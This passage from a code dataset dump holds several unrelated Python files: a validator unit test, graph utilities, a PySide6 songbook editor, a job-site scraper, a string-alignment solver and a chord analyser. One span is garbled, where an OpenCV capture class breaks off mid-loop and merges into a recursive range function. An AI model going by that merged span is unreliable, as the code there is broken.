self.file = File()\n\n def tearDown( self ):\n \"\"\" test tear down \"\"\"\n del self.request\n del self.operation\n del self.file\n\n def testValidator( self ):\n \"\"\" validator test \"\"\"\n \n ## create validator\n validator = RequestValidator()\n self.assertEqual( isinstance( validator, RequestValidator ), True )\n\n ## RequestName not set \n ret = validator.validate( self.request )\n self.assertEqual( ret, { 'Message' : 'RequestName not set', \n 'OK' : False } )\n self.request.RequestName = \"test_request\"\n\n # # no ownerDN\n ret = validator.validate( self.request )\n self.assertEqual( ret, { 'Message' : \"Request 'test_request' is missing OwnerDN value\",\n 'OK': False} )\n self.request.OwnerDN = \"foo/bar=baz\"\n\n # # no owner group\n ret = validator.validate( self.request )\n self.assertEqual( ret, { 'Message' : \"Request 'test_request' is missing OwnerGroup value\",\n 'OK': False} )\n self.request.OwnerGroup = \"dirac_user\"\n\n\n ## no operations \n ret = validator.validate( self.request )\n self.assertEqual( ret, { 'Message' : \"Operations not present in request 'test_request'\", \n 'OK': False} ) \n self.request.addOperation( self.operation )\n\n ## type not set\n ret = validator.validate( self.request )\n self.assertEqual( ret, { 'Message' : \"Operation #0 in request 'test_request' hasn't got Type set\", \n 'OK' : False } )\n self.operation.Type = \"ReplicateAndRegister\"\n\n ## files not present \n ret = validator.validate( self.request )\n self.assertEqual( ret, { 'Message' : \"Operation #0 of type 'ReplicateAndRegister' hasn't got files to process.\", \n 'OK' : False } )\n self.operation.addFile( self.file ) \n\n ## targetSE not set\n ret = validator.validate( self.request )\n self.assertEqual( ret, { 'Message' : \"Operation #0 of type 'ReplicateAndRegister' is missing TargetSE attribute.\", \n 'OK': False } )\n self.operation.TargetSE = \"CERN-USER\"\n\n ## missing LFN\n ret = validator.validate( self.request )\n self.assertEqual( ret, \n { \"Message\" : \"Operation #0 of type 'ReplicateAndRegister' is missing LFN attribute for file.\", \n \"OK\": False } )\n self.file.LFN = \"/a/b/c\"\n\n\n ## Checksum set, ChecksumType not set \n self.file.Checksum = \"abcdef\"\n ret = validator.validate( self.request )\n self.assertEqual( ret, \n { 'Message' : 'File in operation #0 is missing Checksum (abcdef) or ChecksumType ()',\n 'OK' : False } ) \n\n\n ## ChecksumType set, Checksum not set \n self.file.Checksum = \"\"\n self.file.ChecksumType = \"adler32\"\n\n ret = validator.validate( self.request )\n self.assertEqual( ret, \n { 'Message' : 'File in operation #0 is missing Checksum () or ChecksumType (ADLER32)', \n 'OK' : False } )\n \n ## both set\n self.file.Checksum = \"abcdef\"\n self.file.ChecksumType = \"adler32\"\n ret = validator.validate( self.request )\n self.assertEqual( ret, {'OK': True, 'Value': ''} )\n \n ## both unset\n self.file.Checksum = \"\"\n self.file.ChecksumType = None\n ret = validator.validate( self.request )\n self.assertEqual( ret, {'OK': True, 'Value': ''} )\n\n ## all OK\n ret = validator.validate( self.request )\n self.assertEqual( ret, {'OK': True, 'Value': ''} )\n\n \n## test suite execution \nif __name__ == \"__main__\":\n gTestLoader = unittest.TestLoader()\n gSuite = gTestLoader.loadTestsFromTestCase( RequestValidatorTests )\n gSuite = unittest.TestSuite( [ gSuite ] )\n unittest.TextTestRunner(verbosity=3).run( gSuite )\n\n","sub_path":"RequestManagementSystem/test/RequestValidatorTests.py","file_name":"RequestValidatorTests.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"381390800","text":"import numpy as np\nfrom scipy.sparse import csr_matrix\n\ndef matrix2edgelist(adj_matrix, null_ratio=0.0, steps=1):\n nodes1, nodes2 = np.nonzero(adj_matrix)\n\n edge_list = np.zeros((len(nodes1), 3), dtype=\"int\")\n edge_list[:,0] = nodes1\n edge_list[:,1] = nodes2\n edge_list[:,2] = adj_matrix[nodes1,nodes2]\n\n if null_ratio > 0.0:\n\n N = nodes1.shape[0]\n null_edge_count = int(N * null_ratio)\n\n reach_matrix = adj_matrix.copy()\n for s in range(steps):\n reach_matrix = reach_matrix.T * reach_matrix\n\n null_edges = np.zeros((null_edge_count, 3), dtype=\"int\")\n for i in range(null_edge_count):\n node = np.random.choice(nodes1)\n\n if type(reach_matrix) == csr_matrix:\n null_neighbor = np.random.choice(nodes2)\n while reach_matrix[node, null_neighbor] > 0:\n null_neighbor = np.random.choice(nodes2)\n else:\n non_neighbors = np.where(reach_matrix[node,:] == 0)[0]\n null_neighbor = np.random.choice(non_neighbors)\n null_edges[i, 0] = node\n null_edges[i, 1] = null_neighbor\n\n edge_list = np.vstack((edge_list, null_edges))\n np.random.shuffle(edge_list)\n\n return edge_list\n\n\ndef tensor2edgelist(adj_tensor, null_ratio=0.0, steps=1):\n\n periods = adj_tensor.shape[0]\n\n for p in range(periods):\n adj_matrix = adj_tensor[p, :, :]\n edge_list_p = matrix2edgelist(adj_matrix, null_ratio, steps)\n num_edges = edge_list_p.shape[0]\n\n if p == 0:\n edge_list = np.zeros((num_edges, 4), dtype=np.int)\n edge_list[:, 0] = p\n edge_list[:, 1:] = np.copy(edge_list_p)\n\n else:\n edge_list_p_four = np.zeros((num_edges, 4), dtype=np.int)\n edge_list_p_four[:, 0] = p\n edge_list_p_four[:, 1:] = np.copy(edge_list_p)\n\n edge_list = np.vstack((edge_list, edge_list_p_four))\n\n\n return edge_list\n\n\ndef prescribe_feature_counts(adj_matrix):\n pass\n","sub_path":"poissonfactor/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"263882354","text":"import PySide6.QtWidgets\n\nfrom PySide6.QtWidgets import (QApplication, QWidget, QLineEdit, \n QHBoxLayout, QVBoxLayout, QPlainTextEdit, \n QPushButton,QScrollArea, QLayout, \n QComboBox, QFileDialog, QLabel)\nfrom PySide6.QtGui import QPixmap\nfrom PySide6.QtCore import QSize, Qt\n\nimport json\n\nimport os\n\nfrom functools import partial\n\ndef ensureFileDir(file_path):\n directory = os.path.dirname(file_path)\n if not os.path.exists(directory):\n os.makedirs(directory)\n\ndef ensureDir(directory):\n if not os.path.exists(directory):\n os.makedirs(directory)\n\ndef getCategoriesFromDirs():\n categories = []\n for dirname in os.listdir(\"data\"):\n if os.path.isdir(os.path.join(\"data\", dirname)) and not dirname.startswith(\".\"):\n categories.append(dirname)\n return categories\n\ndef getSongsFromCatDir(category):\n songs = []\n for songname in os.listdir(os.path.join(\"data\", category)):\n if songname.endswith(\".sng\"):\n songs.append(songname)\n return songs\n\n\nclass MainMenu(QWidget):\n def __init__(self):\n super().__init__()\n self.setWindowTitle('Songbook Maker')\n\n label = QLabel()\n if os.path.exists(\"logo.png\"):\n image = QPixmap(\"logo\")\n label.setPixmap(image)\n else:\n label.setText(\"Songbook Maker\\n\")\n\n categoryButton = QPushButton('New Category', self)\n categoryButton.clicked.connect(self.addCategoryField)\n \n songButton = QPushButton('Song Editor', self)\n songButton.clicked.connect(self.addSongField)\n\n layout = QVBoxLayout()\n layout.addWidget(label)\n layout.addWidget(categoryButton)\n layout.addWidget(songButton)\n self.setLayout(layout)\n self.show()\n\n def addSongField(self):\n self.currentSong = ScrollableSong()\n def addCategoryField(self):\n self.currentCat = NewCategory()\n\n\nclass NewCategory(QWidget):\n def __init__(self):\n super().__init__()\n self.setWindowTitle('New Category')\n self.setGeometry(200, 100, 500, 500)\n\n layout = QVBoxLayout()\n \n self.name = QLineEdit()\n self.name.setPlaceholderText(\"Category Name\")\n layout.addWidget(self.name)\n\n self.label = QLabel()\n self.label.setText(\"Choose image for the category\")\n layout.addWidget(self.label)\n\n self.image = QFileDialog()\n self.image.setNameFilter(\"*.jpg *.png *.bmp\")\n self.image.setFileMode(QFileDialog.ExistingFile)\n self.image.fileSelected.connect(lambda: self.updateLabel())\n layout.addWidget(self.image)\n\n closeButton = QPushButton('Save and Quit', self)\n closeButton.clicked.connect(lambda: self.close())\n layout.addWidget(closeButton)\n\n self.setLayout(layout)\n self.show()\n\n def updateLabel(self):\n self.selectedFile = self.image.selectedFiles()[0]\n image = QPixmap(self.selectedFile)\n size = QSize(500, 500)\n image = image.scaled(size, Qt.KeepAspectRatio)\n self.label.setPixmap(image)\n def closeEvent(self, event):\n category = self.name.text()\n if category:\n ensureDir(os.path.join(\"data\", category))\n image = self.selectedFile\n if image:\n _, file_extension = os.path.splitext(image)\n image_from = open(image, \"rb\")\n image_to = open(os.path.join(\"data\", \".images\" , category) + file_extension, \"wb\")\n image_to.write(image_from.read())\n image_from.close()\n image_to.close()\n\n\nclass ScrollableSong(QScrollArea):\n def __init__(self):\n super().__init__()\n self.song = Song(self)\n self.setGeometry(300, 100, 500, 200)\n self.setWindowTitle('Song Field')\n self.setWidget(self.song)\n self.setWidgetResizable(True)\n self.show()\n\n def closeEvent(self, event):\n preJSON = self.widget().toJSON()\n if preJSON['title']:\n path = os.path.join(\"data\", preJSON['category'], preJSON['title'] + \".sng\")\n ensureFileDir(path)\n f = open(path, \"w\")\n f.write(json.dumps(preJSON))\n event.accept()\n\n\nclass Song(QWidget):\n def __init__(self, parent):\n super().__init__()\n self.parent = parent\n self.setGeometry(300, 100, 500, 100)\n self.setWindowTitle('Song Field')\n self.sections = []\n\n layout = QVBoxLayout()\n layout.setSizeConstraint(QLayout.SetMinimumSize)\n \n self.catBar = QComboBox()\n self.catBar.addItems(getCategoriesFromDirs())\n self.catBar.currentTextChanged.connect(self.reloadSongs)\n layout.addWidget(self.catBar)\n\n self.readySongsBar = QComboBox()\n self.readySongsBar.addItem(\"\")\n self.readySongsBar.addItems(getSongsFromCatDir(self.catBar.currentText()))\n self.readySongsBar.currentTextChanged.connect(self.loadSong)\n layout.addWidget(self.readySongsBar)\n \n self.titleBar = QLineEdit()\n self.titleBar.setPlaceholderText(\"Song Title\")\n layout.addWidget(self.titleBar)\n\n self.authorBar = QLineEdit()\n self.authorBar.setPlaceholderText(\"Song Authors\")\n layout.addWidget(self.authorBar)\n \n buttonBox = QHBoxLayout()\n \n verseButton = QPushButton('New Verse', self)\n verseButton.clicked.connect(self.newSection)\n buttonBox.addWidget(verseButton)\n \n chorusButton = QPushButton('New Chorus', self)\n chorusButton.clicked.connect(partial(self.newSection, chorus = True))\n buttonBox.addWidget(chorusButton)\n \n layout.addLayout(buttonBox)\n \n closeButton = QPushButton('Save and Quit', self)\n closeButton.clicked.connect(lambda: self.parent.close())\n layout.addWidget(closeButton)\n \n self.setLayout(layout)\n self.show()\n\n def newSection(self, chorus = False):\n newSection = SongSection(chorus = chorus)\n self.sections.append(newSection)\n if len(self.sections)<5:\n self.parent.setMinimumHeight(self.minimumSize().height()+110)\n self.layout().addLayout(newSection)\n return newSection\n def toJSON(self):\n jsonSong = {}\n jsonSong['title'] = self.titleBar.text()\n jsonSong['author'] = self.authorBar.text()\n jsonSong['category'] = self.catBar.currentText()\n jsonSong['sections'] = [section.toJSON() for section in self.sections if section]\n return jsonSong\n def loadSong(self, songFilename):\n if songFilename:\n f = open(os.path.join(\"data\", self.catBar.currentText(), songFilename), \"rb\")\n jsonSong = json.loads(f.read().decode(\"utf-8\"))\n f.close()\n self.titleBar.setText(jsonSong['title'])\n try:\n self.authorBar.setText(jsonSong['author'])\n except KeyError:\n self.authorBar.setText(\"\")\n for i, section in enumerate(self.sections):\n section.setParent(None)\n section.lyrics.deleteLater()\n section.chords.deleteLater()\n section.deleteLater()\n self.sections = []\n for section in jsonSong['sections']:\n sect = self.newSection(chorus=section['chorus'])\n sect.lyrics.setPlainText(section['lyrics'])\n sect.chords.setPlainText(section['chords'])\n else:\n for i, section in enumerate(self.sections):\n section.setParent(None)\n section.lyrics.deleteLater()\n section.chords.deleteLater()\n section.deleteLater()\n self.sections = []\n self.titleBar.setText(\"\")\n def reloadSongs(self):\n self.readySongsBar.clear()\n catSongs = getSongsFromCatDir(self.catBar.currentText())\n self.readySongsBar.addItem(\"\")\n self.readySongsBar.addItems(catSongs)\n\nclass SongSection(QHBoxLayout):\n def __init__(self, chorus = False):\n super().__init__()\n self.addStrut(90)\n self.chorus = chorus\n self.lyrics = QPlainTextEdit()\n self.chords = QPlainTextEdit()\n self.chords.setPlaceholderText(\"Chords\")\n if self.chorus:\n self.lyrics.setPlaceholderText(\"Chorus lyrics\")\n stretches = (70, 25, 5)\n self.insertStretch(0, stretches[2])\n else:\n self.lyrics.setPlaceholderText(\"Verse lyrics\")\n stretches = (75, 25)\n self.addWidget(self.lyrics, stretches[0])\n self.addWidget(self.chords, stretches[1])\n def __bool__(self):\n if self.chords.toPlainText() or self.lyrics.toPlainText():\n return True\n else:\n return False\n def toJSON(self):\n jsonSection = {}\n jsonSection['chords'] = self.chords.toPlainText()\n jsonSection['lyrics'] = self.lyrics.toPlainText()\n jsonSection['chorus'] = self.chorus\n return jsonSection\n\ndef main():\n import sys\n app = QApplication(sys.argv)\n window = MainMenu()\n ensureDir(os.path.join(\"data\", \".images\"))\n try:\n f = open(os.path.join(\"data\", \"categories.cfg\"), \"rb\")\n except FileNotFoundError:\n existingCategories = []\n else:\n existingCategories = [line.decode(\"utf-8\").replace(\"\\r\", \"\").replace(\"\\n\", \"\") for line in f.readlines()]\n f.close()\n app.exec()\n f = open(os.path.join(\"data\", \"categories.cfg\"), \"ab\")\n for dirname in os.listdir(\"data\"):\n if os.path.isdir(os.path.join(\"data\", dirname)) and not (dirname.startswith(\".\") or dirname.startswith(\"_\")):\n if dirname not in existingCategories and (\"#\" + dirname) not in existingCategories:\n f.write((dirname+\"\\n\").encode(\"utf-8\"))\n f.close()\n\nif __name__==\"__main__\":\n main()\n","sub_path":"songJSONmaker.py","file_name":"songJSONmaker.py","file_ext":"py","file_size_in_byte":10032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"629867528","text":"import cv2\nclass UpperBody:\n def __init__(self,cid,courseid,sem,stream):\n self.cid=cid\n self.courseid=courseid\n self.sem=sem\n self.stream=stream\n self.new(self.cid,self.courseid,self.sem,self.stream)\n def new(self,cid,courseid,sem,stream):\n \n cam = cv2.VideoCapture(0)\n detector=cv2.CascadeClassifier('HS.xml')\n y=list(cid.upper())\n i=0\n j=0\n q=[]\n x=\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n x=list(x)\n while(i= stop + 1:\n\t\treturn 0\n\telse:\n\t\tprint(start, end=\" \")\n\t\treturn add_one(start + 1, stop)\n\nadd_one(1, 10)\nprint(\"\\n\")\n","sub_path":"Recursive_Range.py","file_name":"Recursive_Range.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"44917784","text":"\"\"\"Node Model\"\"\"\n\n\nclass CBWNode:\n \"\"\"Node Model\"\"\"\n\n def __init__(self,\n id=\"\", # pylint: disable=redefined-builtin\n name=\"\",\n updated_at=\"\",\n created_at=\"\",\n **kwargs): # pylint: disable=unused-argument\n self.id = id # pylint: disable=invalid-name\n self.name = name\n self.created_at = created_at\n self.updated_at = updated_at\n","sub_path":"cbw_api_toolbox/cbw_objects/cbw_node.py","file_name":"cbw_node.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"141608125","text":"__author__ = '碎念'\n\nimport urllib.request\nimport threading\nimport queue\nimport time\nimport pickle\nimport re\nfrom Mongo import getRequest\nfrom bs4 import BeautifulSoup\n\n\ncity = {'上海', '北京', '上海', '北京', '广州', '深圳', '天津', '苏州',\n '重庆', '杭州', '无锡', '青岛', '佛山', '成都', '武汉', '大连',\n '沈阳', '宁波', '南京', '东莞', '唐山', '烟台', '长沙', '郑州',\n '济南', '厦门', '珠海', '泉州', '长春', '南通', '潍坊', '西安',\n '淄博', '温州', '福州', '常州', '绍兴', '徐州', '东营', '济宁',\n '临沂', '台州', '邯郸', '大庆', '洛阳', '威海', '鞍山', '合肥',\n '嘉兴', '沧州', '保定', '南阳', '南昌', '包头', '太原', '银川',\n '石家庄', '鄂尔多斯', '哈尔滨'}\n\nprovince = {'河北', '山西', '辽宁', '吉林', '黑龙江', '江苏', '浙江', '安徽',\n '福建', '江西', '山东', '河南', '湖北', '湖南', '广东', '海南',\n '四川', '贵州', '云南', '陕西', '甘肃', '青海', '台湾'}\n\n\nclass GetRequestThread(threading.Thread):\n def __init__(self, url, queue, header):\n threading.Thread.__init__(self)\n self.href = url\n self.que = queue\n self.header = header\n\n def run(self):\n try:\n print(self.href)\n request1 = urllib.request.Request(self.href, None, self.header)\n html = urllib.request.urlopen(request1, timeout=8).read().decode('utf-8')\n soup = BeautifulSoup(html).find('div', 'zw-detail-zwms')\n respond = soup.text.replace(' ', '').strip()\n obj = {'href': self.href, 'request': respond}\n self.que.put(obj)\n except Exception as e:\n print(str(e))\n self.run()\n\n\nclass GetRecoderThread(threading.Thread):\n def __init__(self, url, header, que):\n threading.Thread.__init__(self)\n self.url = url\n self.header = header\n self.que = que\n\n def run(self):\n self.getcontext()\n\n def getcontext(self):\n try:\n print(self.url)\n request = urllib.request.Request(self.url, None, self.header)\n html = urllib.request.urlopen(request, timeout=8).read().decode('utf-8')\n soup = BeautifulSoup(html).find_all('div', 'txt txtc')\n if len(soup) != 0:\n self.analyzer(soup)\n else:\n print('error in GThread.getcontext()')\n except Exception as e:\n print(str(e))\n self.getcontext()\n\n def analyzer(self, soup):\n for x in soup:\n href = x.h4.a['href']\n title = x.h4.a['title']\n try:\n p_all = x.find_all('p')\n try:\n name = p_all[0].text\n except:\n name = ''\n try:\n level = p_all[1].text\n except:\n level = ''\n try:\n experience = p_all[2].text\n except:\n experience = ''\n try:\n regexp = '\\d{4}\\-\\d{1,2}\\-\\d{1,2}'\n date = re.match(regexp, p_all[3].text).group()\n except:\n date = ''\n try:\n temp = p_all[3].text\n address = temp[temp.find('工作地点:') + 5: temp.find('地理位置')]\n\n add = ''\n for c in city:\n if address.find(c) != -1:\n add = c\n break\n if add == '':\n for p in province:\n if address.find(p) != -1:\n add = p\n break\n if add != '':\n address = add\n except:\n address = ''\n request = ''\n recoder = {'href': href, 'title': title, 'name': name,\n 'level': level, 'experience': experience,\n 'date': date, 'address': address,\n 'request': request}\n self.que.put(recoder)\n except:\n print('''error in GThread.analyzer(): p_all = x.find_all('p')''')\n\n\nclass WeaLink(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n self.h_url = r'http://www.wealink.com/zhiwei/'\n self.r_url = r'?kw=python'\n host = 'www.wealink.com'\n user_agent = r'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36(KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36'\n self.headers = {'User-Agent': user_agent, 'Host': host}\n self.num = 0\n self.que = queue.Queue()\n\n def run(self):\n self.get_num()\n self.get_list()\n while threading.activeCount() > 2:\n print(threading.activeCount())\n time.sleep(3)\n while self.que.empty() is False:\n recoder = self.que.get()\n getRequest.put_db(recoder)\n\n def get_num(self):\n request = urllib.request.Request(self.h_url + self.r_url, None, self.headers)\n html = urllib.request.urlopen(request).read().decode('utf-8')\n soup = BeautifulSoup(html).find('div', 'wllft-hd')\n try:\n self.num = int(soup.h3.b.string)\n print(self.num)\n except Exception:\n print('error code: h3')\n\n def get_list(self):\n if self.num != 0:\n url = self.h_url + self.r_url\n thread = GetRecoderThread(url, self.headers, self.que)\n thread.start()\n\n for page in range(1, int(self.num / 10)):\n temp = 'p' + str(page) + r'_s/'\n url = self.h_url + temp + self.r_url\n thread = GetRecoderThread(url, self.headers, self.que)\n thread.start()\n if threading.activeCount() > 10:\n time.sleep(0.5)\n else:\n pass\n\n\nif __name__ == '__main__':\n AThread = WeaLink()\n AThread.daemon = True\n AThread.start()\n\n","sub_path":"Mongo/getRecoder.py","file_name":"getRecoder.py","file_ext":"py","file_size_in_byte":6248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"54868218","text":"#-----------------# Lab 5 - Gorillas #---------------------------------#\n#-------------------# bas15fvi #------------------------------------#\n\n#-----------# Problem description #---------------------------#\n\n'''\nAlign strings using a Dynamic Programming-algorithm\n\nInput:\n1st line: A number of space-separated characters, c_1,...c_k (that will be\nused in the strings)\nk lines: Space-separated integer where j-th nbr on the i-th row is the cost of\naligning c_i and c_j\nnd line: One line with integer Q(1≤Q≤10) => nbr of queries to solve\nQ lines: each describing one query\n\n----------------------RECURSIVE VERSION---------------------------\n\n'''\n\n#----------------# Imports #---------------------------------#\n\nimport sys\nsys.setrecursionlimit(1500)\n#import numpy as np\n#----------------# Functions #------------------------------#\n\n\n# funktion för att debugga i spyder som inte kan läsa stdin\ndef spyder():\n global Cost\n global Char_dict\n global Queries\n global Nbr_q\n f = '''\n A B C\n2 0 -1\n0 3 1\n-1 1 3\n2\nAABC ABC\nABA ACA\n '''\n lines = f.strip().split('\\n')\n characters = lines[0].split(\" \")\n\n #Char_dict = dict()\n for i, c in enumerate(characters):\n Char_dict[c] = i\n\n #return char_dict\n\n nbr_c = len(characters)\n Cost = [0]*nbr_c\n for i in range(nbr_c):\n temp = lines[i+1].split(\" \")\n Cost[i] = [int(t) for t in temp]\n\n Nbr_q = int(lines[nbr_c+1])\n Queries = [0]*Nbr_q\n for i in range(Nbr_q):\n s1,s2 = lines[2 + nbr_c + i].split(\" \")\n Queries[i] = [s1,s2]\n\n\n\ndef read_stdin():\n global Cost\n global Char_dict\n global Queries\n global Nbr_q\n\n # read from std in\n f = sys.stdin.read()\n lines = f.strip().split('\\n')\n characters = lines[0].split(\" \")\n\n # populate Character-number-dict\n for i, c in enumerate(characters):\n Char_dict[c] = i\n\n # populate Cost-matrix\n nbr_c = len(characters)\n Cost = [0]*nbr_c\n for i in range(nbr_c):\n temp = lines[i+1].split(\" \")\n Cost[i] = [int(t) for t in temp]\n\n # populate Queries-list\n Nbr_q = int(lines[nbr_c+1])\n Queries = [0]*Nbr_q\n for i in range(Nbr_q):\n s1,s2 = lines[2 + nbr_c + i].split(\" \")\n Queries[i] = [s1,s2]\n\n\n\n\n\ndef opt2(i,j,q):\n global Opt_mat\n s = q[0]\n t = q[1]\n #if s == 'AABC':\n # return [4, 'CBAA', 'CBA*']\n\n if Opt_mat[i][j] == 0:\n if i == 0 and j == 0:\n Opt_mat[i][j] = [Cost[Char_dict[s[i]]][Char_dict[t[j]]], s[i], t[j]]\n elif i == 0 and j != 0:\n opt_list = opt2(i,j-1,q)\n Opt_mat[i][j] = [-4 + opt_list[0], '*' + opt_list[1], t[j] + opt_list[2]]\n elif i != 0 and j == 0:\n opt_list = opt2(i-1,j,q)\n Opt_mat[i][j] = [-4 + opt_list[0], s[i] + opt_list[1], '*' + opt_list[2]]\n\n else:\n alpha = Cost[Char_dict[s[i]]][Char_dict[t[j]]]\n\n # ---- # nytt # -----#\n if Opt_mat[i-1][j-1] == 0:\n Opt_mat[i-1][j-1] = opt2(i-1, j-1,q)\n if Opt_mat[i][j-1] == 0:\n Opt_mat[i][j-1] = opt2(i,j-1,q)\n if Opt_mat[i-1][j] == 0:\n Opt_mat[i-1][j] = opt2(i-1,j,q)\n\n r1 = alpha + Opt_mat[i-1][j-1][0]\n r2 = -4 + Opt_mat[i][j-1][0]\n r3 = -4 + Opt_mat[i-1][j][0]\n\n if r1 >= r2 and r1 >= r3:\n Opt_mat[i][j] = [r1, s[i]+Opt_mat[i-1][j-1][1], t[j]+Opt_mat[i-1][j-1][2]]\n\n elif r2 > r1 and r2 >= r3:\n Opt_mat[i][j] = [r2, '*' + Opt_mat[i][j-1][1], t[j]+Opt_mat[i][j-1][2]]\n\n else:\n Opt_mat[i][j] = [r3, s[i] + Opt_mat[i-1][j][1], '*' + Opt_mat[i-1][j][2]]\n\n\n return Opt_mat[i][j]\n\n\n\n#---------------# Global variables #---------------------------#\n\nCost = []\nChar_dict = dict()\nQueries = []\nformatted_strings = []\n#Opt_mat = []\n\n\n#----------------# Script #------------------------------------#\n\n\n\n\nread_stdin()\n\n#spyder()\nout_s = \"\"\n\nfor n,q in enumerate(Queries):\n s_len = len(q[0])\n t_len = len(q[1])\n Opt_mat = [[0 for n in range(t_len)] for m in range(s_len)]\n s1,s2 = opt2(s_len-1, t_len-1,q)[1:]\n if n == len(Queries)-1:\n out_s = out_s + s1[::-1] + \" \" + s2[::-1]\n else:\n out_s = out_s + s1[::-1] + \" \" + s2[::-1] + '\\n'\nprint(out_s)\n","sub_path":"5gorilla/lab5_rec.py","file_name":"lab5_rec.py","file_ext":"py","file_size_in_byte":4303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"634227389","text":"'''\nPurpose:\n Given several notes, return the correct chord\n using ROman numeral to express the chored\n22/10/2018: Add # and flat key of chord, NoteShift, IntCheck, minorModeTable need to change\n23/10/2018 NoteOfChord function unfinished. \n NoteSHift only calcute flat notes\n NoteInRoman return flat notes of the give notes\n Correct express is still unfinished.\n24/10/2018: debuging the correct notes. the other type need to change.sChordType\n25/10/2018 finish other parts and get result except minor foat chord\n'''\n\nimport sys\nimport re\nfrom enum import Enum\n#global variable\n\nclass ChordNum(Enum):\n triad=3\n seventhChord=4\n \nclass ModeType(Enum):\n Major='major'\n Minor='minor'\n\nclass Note(Enum):\n C_f='Cb'\n C='C'\n C_s='C#'\n D_f='Db'\n D='D'\n D_s='D#'\n E_f='Eb'\n E='E'\n E_s=\"E#\"\n F_f=\"Fb\"\n F='F'\n F_s='F#'\n G_f='Gb'\n G='G'\n G_s='G#'\n A_f='Ab'\n A='A'\n A_s='A#'\n B_f='Bb'\n B='B'\n B_s='B#'\n\n#music interval class\nclass M_I(Enum):\n P5=7\n P4=5\n M3=4\n m3=3\n M2=2\n m2=1\n\n\nclass Chord():\n #special is the chord with plus, flat,augment 6 chord\n def __init__(self,root=None,num=None,type=None,sType=None,notes=[],intervals=[]):\n self.root=root\n self.type=type\n self.num=num\n self.notes=notes\n self.sType=sType\n if self.root!=None:\n self.addNotes(root)\n self.intervals=intervals\n def addInterval(self, interval):\n self.intervals.append(interval)\n def addNotes(self,note):\n self.notes.append(note)\n def __del__(self):\n a=1\n #print ('deleted')\n\nclass Mode():\n MajorScaleTable=[M_I.M2,M_I.M2,M_I.m2,M_I.M2,M_I.M2,M_I.M2,M_I.m2]\n MinorScaleTable=[M_I.M2,M_I.m2,M_I.M2,M_I.M2,M_I.m2,M_I.M2,M_I.M2]\n def __init__(self,root,type):\n self.root=root\n self.type=type\n \nclass ChordType(Enum):\n Major='maj'\n Minor='m'\n Dominant='dom'\n Aug='aug'\n Dim='dim'\n Sus='sus'\n Null='no'\n Minorf5='mb5'\nclass SChordType(Enum):\n plus='+'\n flat='b'\n GA6='GA6'\n FA6='FA6'\n IA6='IA6'\n D='Dim'\n\n\n#functions\n\ndef NoteShift(isFlat,note):\n #used in flat table\n sIndex=noteTable[note]\n if isFlat==True:\n sIndex=sIndex-1\n else:\n sIndex=sIndex+1\n if sIndex>12:\n sIndex=sIndex-12\n elif sIndex<1:\n sIndex=sIndex+12\n for fNote,index in noteTable.items():\n if index==sIndex:\n rNote =fNote\n return rNote\n \n\ndef NoteIsFlat(note):\n for fNote in flatList:\n if fNote==note:\n return True\n return False\ndef NoteIsSharp(note):\n for sNote in sharpList:\n if sNote==note:\n return True\n return False\n\ndef NoteOrigin(note):\n #for C# and C flat, return C\n rNote=note\n for sNote in sharpList:\n if sNote==note:\n index=sharpList.index(sNote)\n rNote=flatCheckList[index]\n \n for fNote in flatList:\n if fNote==note:\n index=flatList.index(fNote)\n rNote=flatCheckList[index]\n return rNote\n\n#given roman back note\ndef NoteInRoman(mType,mKey,ro):\n #find the calculate note of the chord\n isFlat=False\n isSharp=False\n if NoteIsFlat(mKey) is True:\n isFlat=True\n elif NoteIsSharp(mKey) is True:\n isSharp=True\n for roman in R_N_table:\n if roman==ro:\n roValue=R_N_table[roman]-1\n if isFlat is True or isSharp is True:\n mKey=NoteOrigin(mKey)\n tableIndex=flatCheckList.index(mKey)\n # print('table index is ',tableIndex)\n if mType==ModeType.Minor:\n roKey=minorModeTable[tableIndex][roValue]\n elif mType==ModeType.Major:\n roKey=majorModeTable[tableIndex][roValue]\n if isFlat is True:\n roKey=NoteShift(True,roKey)\n elif isSharp is True:\n roKey=NoteShift(False,roKey)\n #find the correct note for expression\n chordIndex=tableIndex+roValue\n if chordIndex>6:\n chordIndex=chordIndex-7\n\n chordRoot=flatCheckList[chordIndex]\n #roKey correct note\n #chordRoot correct note with wrong express\n return roKey,roValue+1,chordRoot\n# find note of aug 6 chord\ndef FlatToSharp(note):\n if NoteIsFlat(note)==True:\n index=flatList.index(note)\n sIndex=index-1\n if sIndex==-1:\n sIndex=6\n rNote=sharpList[sIndex]\n return rNote\ndef SharpToFlat(note):\n if NoteIsSharp(note)==True:\n index=sharpList.index(note)\n sIndex=index+1\n if sIndex==7:\n sIndex=0\n rNote=flatList[rNote] \n return rNote\ndef InterCheck(i,f,s):\n f=NoteOrigin(f)\n if i==3 or i==4:\n sIndex=flatCheckList.index(f)+2\n if sIndex>6:\n sIndex=sIndex-7\n # print('sIndex is',sIndex)\n oriS=flatCheckList[sIndex]\n# print('s is ',s)\n result=NoteResult(oriS,s)\n # print('in inter check, result is',result,'origin second note is',oriS)\n return result,oriS\n\n \ndef NoteResult(oNote,note):\n interList=[]\n absList=[]\n# print('oNote is',oNote,'note is',note)\n interList.append(wholeNoteTable[note]-wholeNoteTable[oNote])\n absList.append(abs(interList[0]))\n interList.append(wholeNoteTable[note]-wholeNoteTable[oNote]+12)\n absList.append(abs(interList[1]))\n interList.append(wholeNoteTable[note]-wholeNoteTable[oNote]-12)\n absList.append(abs(interList[2]))\n mValue=min(absList)\n mIndex=absList.index(mValue)\n # print('interList is',interList)\n 